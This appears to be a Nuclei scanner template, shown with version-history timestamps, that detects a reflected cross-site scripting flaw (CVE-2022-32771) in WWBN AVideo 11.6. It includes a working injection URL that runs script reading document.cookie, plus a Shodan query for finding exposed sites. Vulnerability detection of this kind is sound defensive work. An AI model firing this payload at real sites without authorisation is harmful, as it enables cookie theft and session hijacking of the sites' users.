nuclei-templates/http/cves/2022/CVE-2022-32771.yaml

55 lines
2.0 KiB
YAML
Raw Normal View History

2022-08-28 07:50:20 +00:00
id: CVE-2022-32771
info:
name: WWBN AVideo 11.6 - Cross-Site Scripting
2022-08-28 07:50:20 +00:00
author: arafatansari
severity: medium
2022-08-28 07:50:20 +00:00
description: |
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2022-08-28 07:50:20 +00:00
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://nvd.nist.gov/vuln/detail/CVE-2022-32771
2022-08-28 10:16:29 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32771
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00056
epss-percentile: 0.21026
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
2022-08-28 07:50:20 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: wwbn
product: avideo
2023-09-06 11:59:08 +00:00
shodan-query: http.html:"AVideo"
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,avideo,xss,wwbn
2022-08-28 07:50:20 +00:00
http:
2022-08-28 10:16:29 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
2022-08-28 07:50:20 +00:00
matchers-condition: and
matchers:
2022-08-28 10:16:29 +00:00
- type: word
part: body
words:
- 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
- 'text: "</script><script>alert(document.cookie);</script>'
condition: or
2022-08-28 07:50:20 +00:00
- type: word
2022-08-28 10:16:29 +00:00
part: header
2022-08-28 07:50:20 +00:00
words:
2022-08-28 10:16:29 +00:00
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100d81cb7f69fb89c7058286a35c0fe5c5f9d88596e23b296f878bbc8f80aa868ec0221008fabc7b887c785fe93f770f54ffb7f70bb75670bc9d9ac2b2f321ceb50b4a8cc:922c64590222798bb761d5b6d8e72950